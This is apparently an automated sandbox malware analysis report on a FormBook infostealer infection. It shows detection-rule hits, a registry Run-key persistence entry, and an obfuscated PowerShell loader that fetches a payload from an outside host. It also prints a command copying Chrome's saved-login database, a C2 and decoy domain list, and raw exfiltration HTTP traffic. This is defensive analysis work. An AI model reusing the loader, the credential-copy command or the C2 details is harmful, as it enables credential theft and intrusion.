        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\raserver.exe, ProcessId: 3964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KFRL5VBPUBT
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\raserver.exe", ParentImage: C:\Windows\SysWOW64\raserver.exe, ParentProcessId: 3964, ParentProcessName: raserver.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 7452, ProcessName: cmd.exe
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\raserver.exe", ParentImage: C:\Windows\SysWOW64\raserver.exe, ParentProcessId: 3964, ParentProcessName: raserver.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 7452, ProcessName: cmd.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", ProcessId: 4040, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodi

        Stealing of Sensitive Information

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\raserver.exe", ParentImage: C:\Windows\SysWOW64\raserver.exe, ParentProcessId: 3964, ParentProcessName: raserver.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 7452, ProcessName: cmd.exe
        Timestamp:07/03/24-07:51:48.424609
        SID:2031412
        Source Port:49708
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.x6hk8.com/dd01/"], "decoy": ["1prostitutki-chelyabinska.com", "o2v7c.rest", "something-organized.com", "etc99.store", "perksaccess.contact", "consuyt.xyz", "dscmodelpapers.com", "dana88.lat", "dumange.com", "pointlomabarreboutique.com", "djtmaga.net", "dentisttanger.com", "17251604.com", "dogcatshoponline.com", "eppgrandeur.com", "jyty3500.com", "felixkang.asia", "xn--22ck2ci1dl0f7b7h.com", "milliesrecruitment.com", "www333804000.com", "g90luv.vip", "glamourverde.store", "tzbgs.com", "alpha-wealth.club", "homestreamztv.com", "alignedinvestment.com", "ragwash.com", "ultrakan.xyz", "clearconceptslearning.com", "explorewithnor.com", "d-b-d.com", "saltdrink.com", "55957462.com", "limbicmindset.com", "baldomerotienda.com", "yh-9.xyz", "easyskinz.xyz", "lovefulmindfulness.com", "030303-11122222.cloud", "sunpulse.store", "rescapital.world", "payizadlt.com", "cindcxyshirts.shop", "vnddq.biz", "pvywgx235i.top", "www708cc.vip", "poa88koi.lol", "aseasyas1234inc.net", "ygudk.biz", "tmdirtbikes.com", "bqzprvkljhwtmnxy.net", "qk09.top", "aiatlant.com", "zayinvest.com", "intermediafx.com", "lemonlight.fun", "eurovisfilo.com", "bluefrazer.com", "835000suns.com", "checkonly.net", "bs2bestat.net", "praywithus.space", "huafu.site", "radleyhealth.com"]}
        Source: Yara matchFile source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free,25_2_00C90115
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8FD30 CryptExportKey,GetLastError,malloc,CryptExportKey,GetLastError,free,25_2_00C8FD30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8DAFB CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,25_2_00C8DAFB
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8FA58 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGenKey,GetLastError,GetLastError,25_2_00C8FA58
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8FE35 CryptBinaryToStringW,GetLastError,malloc,CryptBinaryToStringW,GetLastError,free,SysFreeString,25_2_00C8FE35
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString,25_2_00C90383
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8FF58 CryptStringToBinaryW,GetLastError,malloc,CryptStringToBinaryW,GetLastError,25_2_00C8FF58
        Source: unknownHTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: raserver.exe
        Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi25_2_001E6CD2

        Networking

        barindex
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49708 -> 46.23.69.44:80
        Source: C:\Windows\explorer.exeNetwork Connect: 46.23.69.44 80Jump to behavior
        Source: Malware configuration extractorURLs: www.x6hk8.com/dd01/
        Source: DNS query: www.yh-9.xyz
        Source: global trafficHTTP traffic detected: GET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1Host: www.alignedinvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 46.23.69.44 46.23.69.44
        Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Windows\explorer.exeCode function: 22_2_0B313F82 getaddrinfo,setsockopt,recv,22_2_0B313F82
        Source: global trafficHTTP traffic detected: GET /Negus85.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xdKCjAMEQDWiUiQMPQ170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1Host: www.alignedinvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficDNS traffic detected: DNS query: larryfrank.cpa
        Source: global trafficDNS traffic detected: DNS query: www.alignedinvestment.com
        Source: global trafficDNS traffic detected: DNS query: www.yh-9.xyz
        Source: unknownHTTP traffic detected: POST /dd01/ HTTP/1.1Host: www.alignedinvestment.comConnection: closeContent-Length: 144589Cache-Control: no-cacheOrigin: http://www.alignedinvestment.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.alignedinvestment.com/dd01/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 36 41 3d 4f 6d 76 78 46 53 6d 56 78 64 4e 57 36 4b 35 4a 68 7a 6a 72 35 5a 31 2d 67 76 7e 67 79 37 78 50 42 32 31 50 55 4a 43 4c 79 76 6f 78 4c 6b 4e 79 6c 63 57 5f 6f 6c 33 4a 38 35 59 41 6b 6e 49 44 53 5f 64 65 72 4c 73 6b 7e 75 74 51 50 6b 35 42 49 4c 76 68 62 67 4b 46 42 59 28 38 79 47 55 57 53 2d 7a 68 30 34 6d 31 43 67 54 50 34 32 48 71 53 50 6a 4b 69 35 33 44 73 66 63 77 39 69 51 33 6c 56 39 4d 4c 36 46 6c 49 36 69 37 49 6a 32 6c 67 56 75 67 55 46 43 6b 47 5a 31 38 58 33 78 73 53 61 4d 6a 52 57 37 42 31 4f 32 78 30 38 50 39 76 32 7e 43 48 6b 72 63 4d 4a 4b 6d 6a 68 76 4e 31 57 59 48 56 46 53 72 45 64 6b 2d 33 30 69 7a 7a 64 71 71 6d 5a 34 44 48 52 53 48 69 46 43 75 74 4c 43 7a 50 6a 56 47 78 6b 68 58 49 5a 28 5f 55 2d 51 5f 75 4c 47 43 38 68 76 34 33 61 6a 68 54 64 34 30 71 4b 6d 38 69 50 28 4a 33 68 4f 4b 45 5f 41 67 56 79 62 4f 4b 71 39 65 6c 34 51 50 36 51 39 48 52 4c 77 6d 55 4d 66 6b 6c 5a 28 6b 58 45 64 51 35 50 73 30 4f 33 42 35 74 65 31 45 75 34 6d 39 33 47 66 35 35 34 48 45 37 6b 39 5a 39 63 28 79 7e 4d 42 67 45 46 49 44 48 53 42 42 4c 4e 30 63 69 56 79 4d 75 4d 6c 63 5a 78 66 6b 62 75 28 51 35 5a 53 43 4c 44 68 78 4e 6a 4c 53 79 6a 7e 63 39 76 4b 33 67 43 71 55 69 50 6a 66 7e 31 69 6a 73 63 33 64 38 36 62 49 76 68 48 31 49 45 4e 64 46 5f 33 73 73 36 77 73 66 59 36 78 36 64 52 61 55 42 51 49 30 72 64 2d 51 31 75 31 6f 47 69 54 4d 56 28 50 46 77 55 66 6e 75 33 75 4f 77 39 53 4a 30 54 34 4d 32 77 74 67 6e 66 31 4b 67 6b 57 42 33 4a 63 6f 59 45 41 70 58 34 31 30 75 41 6b 78 42 43 47 4b 4b 33 50 59 79 51 46 65 38 31 63 78 46 6e 6e 76 4d 54 41 68 42 57 66 4a 5f 59 6a 58 32 46 4c 52 51 42 63 56 2d 52 50 5a 42 65 57 6a 42 52 6c 52 6d 70 35 58 4f 4f 6d 6e 4a 66 61 6d 79 33 68 30 70 45 64 49 7a 52 65 5a 32 68 6a 58 62 71 4a 28 5a 39 4e 77 52 65 42 6b 42 44 44 65 48 54 72 4f 43 4e 67 35 6b 73 68 44 30 66 56 41 68 5a 4e 4c 2d 71 68 73 72 68 7a 7a 74 45 4f 30 61 54 6e 64 57 56 37 64 79 4b 6d 56 62 38 35 4f 4d 28 58 47 4c 48 62 47 6f 54 65 35 66 6c 39 76 77 52 4e 61 52 4d 35 46 41 5a 58 68 64 42 48 31 31 4c 59 52 33 42 49 6d 48 57 6a 61 4b 28 5a 28 6b 4e 75 6f 33 42 50 7e 5f 62 59 73 44 52 54 78 61 53 65 33 52 77 55 4f 38 69 5a 51 56 61 4b 32 2d 70 62 63 4b 70 57 6e 5a 51 57 74 51 69 47 73 78 43 6c 36 48 79 70 44 41 6f 6e 43 70 46 6d 41 6c 69 31 4b 71 75 35 6e 5a 4f 31 56 72 36 47 68 6f 53 49 73 5a 35 39 61 34 34 5a 49 56 72 49 49 75 41 68 61 63 75 44 71 57 58 56 59 30 79 55 6d 53 43 75 7e 35 7e 33 30 79 4c 61 33 6b 66 2d 66 4c 70 5a 69 70 4c 48 73 43 73 79 69 52 70 78 55 71 50 4e 61 44 32 69 7e 53 59 65 31 79 42 38 44
        Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsh
        Source: wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000002.1371449760.0000020477690000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.1244435885.000002047770E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244926036.0000020477736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad6f7
        Source: wscript.exe, 00000000.00000003.1244762105.00000204776EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244638102.00000204776C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C72C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://larryfrank.cpa
        Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.c
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cp
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/N
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Ne
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Neg
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negu
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus8
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85.
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85.c
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85.cs
        Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85.csv
        Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://larryfrank.cpa/Negus85.csvXR
        Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free,25_2_00C90115
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString,25_2_00C90383

        System Summary

        barindex
        Source: C:\Windows\SysWOW64\raserver.exeDropped file: C:\Users\user\AppData\Roaming\834O80R0\834logri.iniJump to dropped file
        Source: C:\Windows\SysWOW64\raserver.exeDropped file: C:\Users\user\AppData\Roaming\834O80R0\834logrv.iniJump to dropped file
        Source: amsi32_7748.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
